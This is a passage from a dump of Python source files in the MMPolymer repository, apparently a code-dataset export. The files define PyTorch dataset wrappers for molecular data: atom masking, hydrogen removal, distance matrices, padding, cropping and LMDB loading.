| 1,673 | Python | .py | 39 | 36.769231 | 129 | 0.685732 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,137 | mask_points_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/mask_points_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from functools import lru_cache
import numpy as np
import torch
from unicore.data import Dictionary
from unicore.data import BaseWrapperDataset
from . import data_utils
class MaskPointsDataset(BaseWrapperDataset):
def __init__(
self,
dataset: torch.utils.data.Dataset,
coord_dataset: torch.utils.data.Dataset,
vocab: Dictionary,
pad_idx: int,
mask_idx: int,
noise_type: str,
noise: float = 1.0,
seed: int = 1,
mask_prob: float = 0.15,
leave_unmasked_prob: float = 0.1,
random_token_prob: float = 0.1,
):
assert 0.0 < mask_prob < 1.0
assert 0.0 <= random_token_prob <= 1.0
assert 0.0 <= leave_unmasked_prob <= 1.0
assert random_token_prob + leave_unmasked_prob <= 1.0
self.dataset = dataset
self.coord_dataset = coord_dataset
self.vocab = vocab
self.pad_idx = pad_idx
self.mask_idx = mask_idx
self.noise_type = noise_type
self.noise = noise
self.seed = seed
self.mask_prob = mask_prob
self.leave_unmasked_prob = leave_unmasked_prob
self.random_token_prob = random_token_prob
if random_token_prob > 0.0:
weights = np.ones(len(self.vocab))
weights[vocab.special_index()] = 0
self.weights = weights / weights.sum()
self.epoch = None
if self.noise_type == "trunc_normal":
self.noise_f = lambda num_mask: np.clip(
np.random.randn(num_mask, 3) * self.noise,
a_min=-self.noise * 2.0,
a_max=self.noise * 2.0,
)
elif self.noise_type == "normal":
self.noise_f = lambda num_mask: np.random.randn(num_mask, 3) * self.noise
elif self.noise_type == "uniform":
self.noise_f = lambda num_mask: np.random.uniform(
low=-self.noise, high=self.noise, size=(num_mask, 3)
)
else:
self.noise_f = lambda num_mask: 0.0
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.coord_dataset.set_epoch(epoch)
self.dataset.set_epoch(epoch)
self.epoch = epoch
def __getitem__(self, index: int):
return self.__getitem_cached__(self.epoch, index)
@lru_cache(maxsize=16)
def __getitem_cached__(self, epoch: int, index: int):
ret = {}
with data_utils.numpy_seed(self.seed, epoch, index):
item = self.dataset[index]
coord = self.coord_dataset[index]
sz = len(item)
# don't allow empty sequence
assert sz > 0
# decide elements to mask
num_mask = int(
# add a random number for probabilistic rounding
self.mask_prob * sz
+ np.random.rand()
)
mask_idc = np.random.choice(sz, num_mask, replace=False)
mask = np.full(sz, False)
mask[mask_idc] = True
ret["targets"] = np.full(len(mask), self.pad_idx)
ret["targets"][mask] = item[mask]
ret["targets"] = torch.from_numpy(ret["targets"]).long()
# decide unmasking and random replacement
rand_or_unmask_prob = self.random_token_prob + self.leave_unmasked_prob
if rand_or_unmask_prob > 0.0:
rand_or_unmask = mask & (np.random.rand(sz) < rand_or_unmask_prob)
if self.random_token_prob == 0.0:
unmask = rand_or_unmask
rand_mask = None
elif self.leave_unmasked_prob == 0.0:
unmask = None
rand_mask = rand_or_unmask
else:
unmask_prob = self.leave_unmasked_prob / rand_or_unmask_prob
decision = np.random.rand(sz) < unmask_prob
unmask = rand_or_unmask & decision
rand_mask = rand_or_unmask & (~decision)
else:
unmask = rand_mask = None
if unmask is not None:
mask = mask ^ unmask
new_item = np.copy(item)
new_item[mask] = self.mask_idx
num_mask = mask.astype(np.int32).sum()
new_coord = np.copy(coord)
new_coord[mask, :] += self.noise_f(num_mask)
if rand_mask is not None:
num_rand = rand_mask.sum()
if num_rand > 0:
new_item[rand_mask] = np.random.choice(
len(self.vocab),
num_rand,
p=self.weights,
)
ret["atoms"] = torch.from_numpy(new_item).long()
ret["coordinates"] = torch.from_numpy(new_coord).float()
return ret
class MaskPointsPocketDataset(BaseWrapperDataset):
def __init__(
self,
dataset: torch.utils.data.Dataset,
coord_dataset: torch.utils.data.Dataset,
residue_dataset: torch.utils.data.Dataset,
vocab: Dictionary,
pad_idx: int,
mask_idx: int,
noise_type: str,
noise: float = 1.0,
seed: int = 1,
mask_prob: float = 0.15,
leave_unmasked_prob: float = 0.1,
random_token_prob: float = 0.1,
):
assert 0.0 < mask_prob < 1.0
assert 0.0 <= random_token_prob <= 1.0
assert 0.0 <= leave_unmasked_prob <= 1.0
assert random_token_prob + leave_unmasked_prob <= 1.0
self.dataset = dataset
self.coord_dataset = coord_dataset
self.residue_dataset = residue_dataset
self.vocab = vocab
self.pad_idx = pad_idx
self.mask_idx = mask_idx
self.noise_type = noise_type
self.noise = noise
self.seed = seed
self.mask_prob = mask_prob
self.leave_unmasked_prob = leave_unmasked_prob
self.random_token_prob = random_token_prob
if random_token_prob > 0.0:
weights = np.ones(len(self.vocab))
weights[vocab.special_index()] = 0
self.weights = weights / weights.sum()
self.epoch = None
if self.noise_type == "trunc_normal":
self.noise_f = lambda num_mask: np.clip(
np.random.randn(num_mask, 3) * self.noise,
a_min=-self.noise * 2.0,
a_max=self.noise * 2.0,
)
elif self.noise_type == "normal":
self.noise_f = lambda num_mask: np.random.randn(num_mask, 3) * self.noise
elif self.noise_type == "uniform":
self.noise_f = lambda num_mask: np.random.uniform(
low=-self.noise, high=self.noise, size=(num_mask, 3)
)
else:
self.noise_f = lambda num_mask: 0.0
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.coord_dataset.set_epoch(epoch)
self.dataset.set_epoch(epoch)
self.epoch = epoch
def __getitem__(self, index: int):
return self.__getitem_cached__(self.epoch, index)
@lru_cache(maxsize=16)
def __getitem_cached__(self, epoch: int, index: int):
ret = {}
with data_utils.numpy_seed(self.seed, epoch, index):
item = self.dataset[index]
coord = self.coord_dataset[index]
sz = len(item)
# don't allow empty sequence
assert sz > 0
# mask on the level of residues
residue = self.residue_dataset[index]
res_list = list(set(residue))
res_sz = len(res_list)
# decide elements to mask
num_mask = int(
# add a random number for probabilistic rounding
self.mask_prob * res_sz
+ np.random.rand()
)
mask_res = np.random.choice(res_list, num_mask, replace=False).tolist()
mask = np.isin(residue, mask_res)
ret["targets"] = np.full(len(mask), self.pad_idx)
ret["targets"][mask] = item[mask]
ret["targets"] = torch.from_numpy(ret["targets"]).long()
# decide unmasking and random replacement
rand_or_unmask_prob = self.random_token_prob + self.leave_unmasked_prob
if rand_or_unmask_prob > 0.0:
rand_or_unmask = mask & (np.random.rand(sz) < rand_or_unmask_prob)
if self.random_token_prob == 0.0:
unmask = rand_or_unmask
rand_mask = None
elif self.leave_unmasked_prob == 0.0:
unmask = None
rand_mask = rand_or_unmask
else:
unmask_prob = self.leave_unmasked_prob / rand_or_unmask_prob
decision = np.random.rand(sz) < unmask_prob
unmask = rand_or_unmask & decision
rand_mask = rand_or_unmask & (~decision)
else:
unmask = rand_mask = None
if unmask is not None:
mask = mask ^ unmask
new_item = np.copy(item)
new_item[mask] = self.mask_idx
num_mask = mask.astype(np.int32).sum()
new_coord = np.copy(coord)
new_coord[mask, :] += self.noise_f(num_mask)
if rand_mask is not None:
num_rand = rand_mask.sum()
if num_rand > 0:
new_item[rand_mask] = np.random.choice(
len(self.vocab),
num_rand,
p=self.weights,
)
ret["atoms"] = torch.from_numpy(new_item).long()
ret["coordinates"] = torch.from_numpy(new_coord).float()
return ret
| 9,914 | Python | .py | 237 | 29.518987 | 85 | 0.537728 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,138 | remove_hydrogen_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/remove_hydrogen_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
from functools import lru_cache
from unicore.data import BaseWrapperDataset
class RemoveHydrogenDataset(BaseWrapperDataset):
def __init__(
self,
dataset,
atoms,
coordinates,
remove_hydrogen=False,
remove_polar_hydrogen=False,
):
self.dataset = dataset
self.atoms = atoms
self.coordinates = coordinates
self.remove_hydrogen = remove_hydrogen
self.remove_polar_hydrogen = remove_polar_hydrogen
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
dd = self.dataset[index].copy()
atoms = dd[self.atoms]
coordinates = dd[self.coordinates]
if self.remove_hydrogen:
mask_hydrogen = atoms != "H"
atoms = atoms[mask_hydrogen]
coordinates = coordinates[mask_hydrogen]
if not self.remove_hydrogen and self.remove_polar_hydrogen:
end_idx = 0
for i, atom in enumerate(atoms[::-1]):
if atom != "H":
break
else:
end_idx = i + 1
if end_idx != 0:
atoms = atoms[:-end_idx]
coordinates = coordinates[:-end_idx]
dd[self.atoms] = atoms
dd[self.coordinates] = coordinates.astype(np.float32)
return dd
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class RemoveHydrogenResiduePocketDataset(BaseWrapperDataset):
def __init__(self, dataset, atoms, residues, coordinates, remove_hydrogen=True):
self.dataset = dataset
self.atoms = atoms
self.residues = residues
self.coordinates = coordinates
self.remove_hydrogen = remove_hydrogen
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
dd = self.dataset[index].copy()
atoms = dd[self.atoms]
residues = dd[self.residues]
coordinates = dd[self.coordinates]
if len(atoms) != len(residues):
min_len = min(len(atoms), len(residues))
atoms = atoms[:min_len]
residues = residues[:min_len]
coordinates = coordinates[:min_len, :]
if self.remove_hydrogen:
mask_hydrogen = atoms != "H"
atoms = atoms[mask_hydrogen]
residues = residues[mask_hydrogen]
coordinates = coordinates[mask_hydrogen]
dd[self.atoms] = atoms
dd[self.residues] = residues
dd[self.coordinates] = coordinates.astype(np.float32)
return dd
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class RemoveHydrogenPocketDataset(BaseWrapperDataset):
def __init__(
self,
dataset,
atoms,
coordinates,
holo_coordinates,
remove_hydrogen=True,
remove_polar_hydrogen=False,
):
self.dataset = dataset
self.atoms = atoms
self.coordinates = coordinates
self.holo_coordinates = holo_coordinates
self.remove_hydrogen = remove_hydrogen
self.remove_polar_hydrogen = remove_polar_hydrogen
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
dd = self.dataset[index].copy()
atoms = dd[self.atoms]
coordinates = dd[self.coordinates]
holo_coordinates = dd[self.holo_coordinates]
if self.remove_hydrogen:
mask_hydrogen = atoms != "H"
atoms = atoms[mask_hydrogen]
coordinates = coordinates[mask_hydrogen]
holo_coordinates = holo_coordinates[mask_hydrogen]
if not self.remove_hydrogen and self.remove_polar_hydrogen:
end_idx = 0
for i, atom in enumerate(atoms[::-1]):
if atom != "H":
break
else:
end_idx = i + 1
if end_idx != 0:
atoms = atoms[:-end_idx]
coordinates = coordinates[:-end_idx]
holo_coordinates = holo_coordinates[:-end_idx]
dd[self.atoms] = atoms
dd[self.coordinates] = coordinates.astype(np.float32)
dd[self.holo_coordinates] = holo_coordinates.astype(np.float32)
return dd
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
| 4,929 | Python | .py | 128 | 28.789063 | 84 | 0.597365 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,139 | distance_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/distance_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
import torch
from scipy.spatial import distance_matrix
from functools import lru_cache
from unicore.data import BaseWrapperDataset
class DistanceDataset(BaseWrapperDataset):
def __init__(self, dataset):
super().__init__(dataset)
self.dataset = dataset
@lru_cache(maxsize=16)
def __getitem__(self, idx):
pos = self.dataset[idx].view(-1, 3).numpy()
dist = distance_matrix(pos, pos).astype(np.float32)
return torch.from_numpy(dist)
class EdgeTypeDataset(BaseWrapperDataset):
def __init__(self, dataset: torch.utils.data.Dataset, num_types: int):
self.dataset = dataset
self.num_types = num_types
@lru_cache(maxsize=16)
def __getitem__(self, index: int):
node_input = self.dataset[index].clone()
offset = node_input.view(-1, 1) * self.num_types + node_input.view(1, -1)
return offset
class CrossDistanceDataset(BaseWrapperDataset):
def __init__(self, mol_dataset, pocket_dataset):
super().__init__(mol_dataset)
self.mol_dataset = mol_dataset
self.pocket_dataset = pocket_dataset
@lru_cache(maxsize=16)
def __getitem__(self, idx):
mol_pos = self.mol_dataset[idx].view(-1, 3).numpy()
pocket_pos = self.pocket_dataset[idx].view(-1, 3).numpy()
dist = distance_matrix(mol_pos, pocket_pos).astype(np.float32)
return torch.from_numpy(dist)
| 1,558 | Python | .py | 36 | 37.222222 | 81 | 0.679233 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,140 | __init__.py | FanmengWang_MMPolymer/MMPolymer/data/__init__.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from .key_dataset import KeyDataset
from .normalize_dataset import (
NormalizeDataset,
NormalizeDockingPoseDataset,
)
from .remove_hydrogen_dataset import (
RemoveHydrogenDataset,
RemoveHydrogenResiduePocketDataset,
RemoveHydrogenPocketDataset,
)
from .tta_dataset import (
TTADataset,
TTADockingPoseDataset,
)
from .cropping_dataset import (
CroppingDataset,
CroppingPocketDataset,
CroppingResiduePocketDataset,
CroppingPocketDockingPoseDataset,
)
from .atom_type_dataset import AtomTypeDataset
from .add_2d_conformer_dataset import Add2DConformerDataset
from .distance_dataset import (
DistanceDataset,
EdgeTypeDataset,
CrossDistanceDataset,
)
from .conformer_sample_dataset import (
ConformerSampleDataset,
ConformerSamplePocketDataset,
ConformerSamplePocketFinetuneDataset,
ConformerSampleConfGDataset,
ConformerSampleConfGV2Dataset,
ConformerSampleDockingPoseDataset,
)
from .mask_points_dataset import MaskPointsDataset, MaskPointsPocketDataset
from .coord_pad_dataset import RightPadDatasetCoord, RightPadDatasetCross2D
from .from_str_dataset import FromStrLabelDataset
from .lmdb_dataset import LMDBDataset
from .prepend_and_append_2d_dataset import PrependAndAppend2DDataset
__all__ = [] | 1,406 | Python | .py | 43 | 29.813953 | 75 | 0.828928 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,141 | coord_pad_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/coord_pad_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from unicore.data import BaseWrapperDataset
def collate_tokens_coords(
values,
pad_idx,
left_pad=False,
pad_to_length=None,
pad_to_multiple=1,
):
"""Convert a list of 1d tensors into a padded 2d tensor."""
size = max(v.size(0) for v in values)
size = size if pad_to_length is None else max(size, pad_to_length)
if pad_to_multiple != 1 and size % pad_to_multiple != 0:
size = int(((size - 0.1) // pad_to_multiple + 1) * pad_to_multiple)
res = values[0].new(len(values), size, 3).fill_(pad_idx)
def copy_tensor(src, dst):
assert dst.numel() == src.numel()
dst.copy_(src)
for i, v in enumerate(values):
copy_tensor(v, res[i][size - len(v) :, :] if left_pad else res[i][: len(v), :])
return res
class RightPadDatasetCoord(BaseWrapperDataset):
def __init__(self, dataset, pad_idx, left_pad=False):
super().__init__(dataset)
self.pad_idx = pad_idx
self.left_pad = left_pad
def collater(self, samples):
return collate_tokens_coords(
samples, self.pad_idx, left_pad=self.left_pad, pad_to_multiple=8
)
def collate_cross_2d(
values,
pad_idx,
left_pad=False,
pad_to_length=None,
pad_to_multiple=1,
):
"""Convert a list of 2d tensors into a padded 2d tensor."""
size_h = max(v.size(0) for v in values)
size_w = max(v.size(1) for v in values)
if pad_to_multiple != 1 and size_h % pad_to_multiple != 0:
size_h = int(((size_h - 0.1) // pad_to_multiple + 1) * pad_to_multiple)
if pad_to_multiple != 1 and size_w % pad_to_multiple != 0:
size_w = int(((size_w - 0.1) // pad_to_multiple + 1) * pad_to_multiple)
res = values[0].new(len(values), size_h, size_w).fill_(pad_idx)
def copy_tensor(src, dst):
assert dst.numel() == src.numel()
dst.copy_(src)
for i, v in enumerate(values):
copy_tensor(
v,
res[i][size_h - v.size(0) :, size_w - v.size(1) :]
if left_pad
else res[i][: v.size(0), : v.size(1)],
)
return res
class RightPadDatasetCross2D(BaseWrapperDataset):
def __init__(self, dataset, pad_idx, left_pad=False):
super().__init__(dataset)
self.pad_idx = pad_idx
self.left_pad = left_pad
def collater(self, samples):
return collate_cross_2d(
samples, self.pad_idx, left_pad=self.left_pad, pad_to_multiple=8
)
| 2,592 | Python | .py | 66 | 32.651515 | 87 | 0.609319 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,142 | atom_type_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/atom_type_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from functools import lru_cache
from unicore.data import BaseWrapperDataset
class AtomTypeDataset(BaseWrapperDataset):
def __init__(
self,
raw_dataset,
dataset,
smi="smi",
atoms="atoms",
):
self.raw_dataset = raw_dataset
self.dataset = dataset
self.smi = smi
self.atoms = atoms
@lru_cache(maxsize=16)
def __getitem__(self, index: int):
# for low rdkit version
if len(self.dataset[index]["atoms"]) != len(self.dataset[index]["coordinates"]):
min_len = min(
len(self.dataset[index]["atoms"]),
len(self.dataset[index]["coordinates"]),
)
self.dataset[index]["atoms"] = self.dataset[index]["atoms"][:min_len]
self.dataset[index]["coordinates"] = self.dataset[index]["coordinates"][
:min_len
]
return self.dataset[index]
| 1,067 | Python | .py | 29 | 28.068966 | 88 | 0.598646 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,143 | tta_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/tta_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
from functools import lru_cache
from unicore.data import BaseWrapperDataset
class TTADataset(BaseWrapperDataset):
def __init__(self, dataset, seed, atoms, coordinates, conf_size=10):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.coordinates = coordinates
self.conf_size = conf_size
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
def __len__(self):
return len(self.dataset) * self.conf_size
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
smi_idx = index // self.conf_size
coord_idx = index % self.conf_size
atoms = np.array(self.dataset[smi_idx][self.atoms])
coordinates = np.array(self.dataset[smi_idx][self.coordinates][coord_idx])
smi = self.dataset[smi_idx]["smi"]
target = self.dataset[smi_idx]["target"]
input_ids = self.dataset[smi_idx]["input_ids"]
attention_mask = self.dataset[smi_idx]["attention_mask"]
return {
"atoms": atoms,
"coordinates": coordinates.astype(np.float32),
"smi": smi,
"target": target,
"input_ids": input_ids,
"attention_mask": attention_mask
}
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class TTADockingPoseDataset(BaseWrapperDataset):
def __init__(
self,
dataset,
atoms,
coordinates,
pocket_atoms,
pocket_coordinates,
holo_coordinates,
holo_pocket_coordinates,
is_train=True,
conf_size=10,
):
self.dataset = dataset
self.atoms = atoms
self.coordinates = coordinates
self.pocket_atoms = pocket_atoms
self.pocket_coordinates = pocket_coordinates
self.holo_coordinates = holo_coordinates
self.holo_pocket_coordinates = holo_pocket_coordinates
self.is_train = is_train
self.conf_size = conf_size
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
def __len__(self):
return len(self.dataset) * self.conf_size
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
smi_idx = index // self.conf_size
coord_idx = index % self.conf_size
atoms = np.array(self.dataset[smi_idx][self.atoms])
coordinates = np.array(self.dataset[smi_idx][self.coordinates][coord_idx])
pocket_atoms = np.array(
[item[0] for item in self.dataset[smi_idx][self.pocket_atoms]]
)
pocket_coordinates = np.array(self.dataset[smi_idx][self.pocket_coordinates][0])
if self.is_train:
holo_coordinates = np.array(self.dataset[smi_idx][self.holo_coordinates][0])
holo_pocket_coordinates = np.array(
self.dataset[smi_idx][self.holo_pocket_coordinates][0]
)
else:
holo_coordinates = coordinates
holo_pocket_coordinates = pocket_coordinates
smi = self.dataset[smi_idx]["smi"]
pocket = self.dataset[smi_idx]["pocket"]
return {
"atoms": atoms,
"coordinates": coordinates.astype(np.float32),
"pocket_atoms": pocket_atoms,
"pocket_coordinates": pocket_coordinates.astype(np.float32),
"holo_coordinates": holo_coordinates.astype(np.float32),
"holo_pocket_coordinates": holo_pocket_coordinates.astype(np.float32),
"smi": smi,
"pocket": pocket,
}
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
| 3,964 | Python | .py | 98 | 31.306122 | 88 | 0.615967 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,144 | key_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/key_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from functools import lru_cache
from unicore.data import BaseWrapperDataset
class KeyDataset(BaseWrapperDataset):
def __init__(self, dataset, key):
self.dataset = dataset
self.key = key
def __len__(self):
return len(self.dataset)
@lru_cache(maxsize=16)
def __getitem__(self, idx):
return self.dataset[idx][self.key]
| 497 | Python | .py | 13 | 33.153846 | 69 | 0.705637 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,145 | lmdb_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/lmdb_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import lmdb
import os
import pickle
from functools import lru_cache
import logging
logger = logging.getLogger(__name__)
class LMDBDataset:
def __init__(self, db_path):
self.db_path = db_path
assert os.path.isfile(self.db_path), "{} not found".format(self.db_path)
env = self.connect_db(self.db_path)
with env.begin() as txn:
self._keys = list(txn.cursor().iternext(values=False))
def connect_db(self, lmdb_path, save_to_self=False):
env = lmdb.open(
lmdb_path,
subdir=False,
readonly=True,
lock=False,
readahead=False,
meminit=False,
max_readers=256,
)
if not save_to_self:
return env
else:
self.env = env
def __len__(self):
return len(self._keys)
@lru_cache(maxsize=16)
def __getitem__(self, idx):
if not hasattr(self, "env"):
self.connect_db(self.db_path, save_to_self=True)
datapoint_pickled = self.env.begin().get(f"{idx}".encode("ascii"))
data = pickle.loads(datapoint_pickled)
return data
| 1,286 | Python | .py | 38 | 25.921053 | 80 | 0.604351 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,146 | cropping_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/cropping_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
from functools import lru_cache
import logging
from unicore.data import BaseWrapperDataset
from . import data_utils
logger = logging.getLogger(__name__)
class CroppingDataset(BaseWrapperDataset):
def __init__(self, dataset, seed, atoms, coordinates, max_atoms=256):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.coordinates = coordinates
self.max_atoms = max_atoms
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
dd = self.dataset[index].copy()
atoms = dd[self.atoms]
coordinates = dd[self.coordinates]
if self.max_atoms and len(atoms) > self.max_atoms:
with data_utils.numpy_seed(self.seed, epoch, index):
index = np.random.choice(len(atoms), self.max_atoms, replace=False)
atoms = np.array(atoms)[index]
coordinates = coordinates[index]
dd[self.atoms] = atoms
dd[self.coordinates] = coordinates.astype(np.float32)
return dd
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class CroppingPocketDataset(BaseWrapperDataset):
def __init__(self, dataset, seed, atoms, coordinates, max_atoms=256):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.coordinates = coordinates
self.max_atoms = (
max_atoms # max number of atoms in a molecule, None indicates no limit.
)
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
dd = self.dataset[index].copy()
atoms = dd[self.atoms]
coordinates = dd[self.coordinates]
residue = dd["residue"]
# crop atoms according to their distance to the center of pockets
if self.max_atoms and len(atoms) > self.max_atoms:
with data_utils.numpy_seed(self.seed, epoch, index):
distance = np.linalg.norm(
coordinates - coordinates.mean(axis=0), axis=1
)
def softmax(x):
x -= np.max(x)
x = np.exp(x) / np.sum(np.exp(x))
return x
distance += 1 # prevent inf
weight = softmax(np.reciprocal(distance))
index = np.random.choice(
len(atoms), self.max_atoms, replace=False, p=weight
)
atoms = atoms[index]
coordinates = coordinates[index]
residue = residue[index]
dd[self.atoms] = atoms
dd[self.coordinates] = coordinates.astype(np.float32)
dd["residue"] = residue
return dd
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class CroppingResiduePocketDataset(BaseWrapperDataset):
def __init__(self, dataset, seed, atoms, residues, coordinates, max_atoms=256):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.residues = residues
self.coordinates = coordinates
self.max_atoms = (
max_atoms # max number of atoms in a molecule, None indicates no limit.
)
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
dd = self.dataset[index].copy()
atoms = dd[self.atoms]
residues = dd[self.residues]
coordinates = dd[self.coordinates]
residues_distance_map = {}
# crop atoms according to their distance to the center of pockets
if self.max_atoms and len(atoms) > self.max_atoms:
with data_utils.numpy_seed(self.seed, epoch, index):
distance = np.linalg.norm(
coordinates - coordinates.mean(axis=0), axis=1
)
residues_ids, residues_distance = [], []
for res in residues:
if res not in residues_ids:
residues_ids.append(res)
residues_distance.append(distance[residues == res].mean())
residues_ids = np.array(residues_ids)
residues_distance = np.array(residues_distance)
def softmax(x):
x -= np.max(x)
x = np.exp(x) / np.sum(np.exp(x))
return x
residues_distance += 1 # prevent inf and smoothing out the distance
weight = softmax(np.reciprocal(residues_distance))
max_residues = self.max_atoms // (len(atoms) // (len(residues_ids) + 1))
if max_residues < 1:
max_residues += 1
max_residues = min(max_residues, len(residues_ids))
residue_index = np.random.choice(
len(residues_ids), max_residues, replace=False, p=weight
)
index = [
i
for i in range(len(atoms))
if residues[i] in residues_ids[residue_index]
]
atoms = atoms[index]
coordinates = coordinates[index]
residues = residues[index]
dd[self.atoms] = atoms
dd[self.coordinates] = coordinates.astype(np.float32)
dd[self.residues] = residues
return dd
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class CroppingPocketDockingPoseDataset(BaseWrapperDataset):
def __init__(
self, dataset, seed, atoms, coordinates, holo_coordinates, max_atoms=256
):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.coordinates = coordinates
self.holo_coordinates = holo_coordinates
self.max_atoms = max_atoms
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
dd = self.dataset[index].copy()
atoms = dd[self.atoms]
coordinates = dd[self.coordinates]
holo_coordinates = dd[self.holo_coordinates]
# crop atoms according to their distance to the center of pockets
if self.max_atoms and len(atoms) > self.max_atoms:
with data_utils.numpy_seed(self.seed, epoch):
distance = np.linalg.norm(
coordinates - coordinates.mean(axis=0), axis=1
)
def softmax(x):
x -= np.max(x)
x = np.exp(x) / np.sum(np.exp(x))
return x
distance += 1 # prevent inf
weight = softmax(np.reciprocal(distance))
index = np.random.choice(
len(atoms), self.max_atoms, replace=False, p=weight
)
atoms = atoms[index]
coordinates = coordinates[index]
holo_coordinates = holo_coordinates[index]
dd[self.atoms] = atoms
dd[self.coordinates] = coordinates.astype(np.float32)
dd[self.holo_coordinates] = holo_coordinates.astype(np.float32)
return dd
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
| 7,889 | Python | .py | 182 | 31.659341 | 88 | 0.573664 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,147 | normalize_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/normalize_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
from functools import lru_cache
from unicore.data import BaseWrapperDataset
class NormalizeDataset(BaseWrapperDataset):
def __init__(self, dataset, coordinates, normalize_coord=True):
self.dataset = dataset
self.coordinates = coordinates
self.normalize_coord = normalize_coord # normalize the coordinates.
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
dd = self.dataset[index].copy()
coordinates = dd[self.coordinates]
# normalize
if self.normalize_coord:
coordinates = coordinates - coordinates.mean(axis=0)
dd[self.coordinates] = coordinates.astype(np.float32)
return dd
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class NormalizeDockingPoseDataset(BaseWrapperDataset):
def __init__(
self,
dataset,
coordinates,
pocket_coordinates,
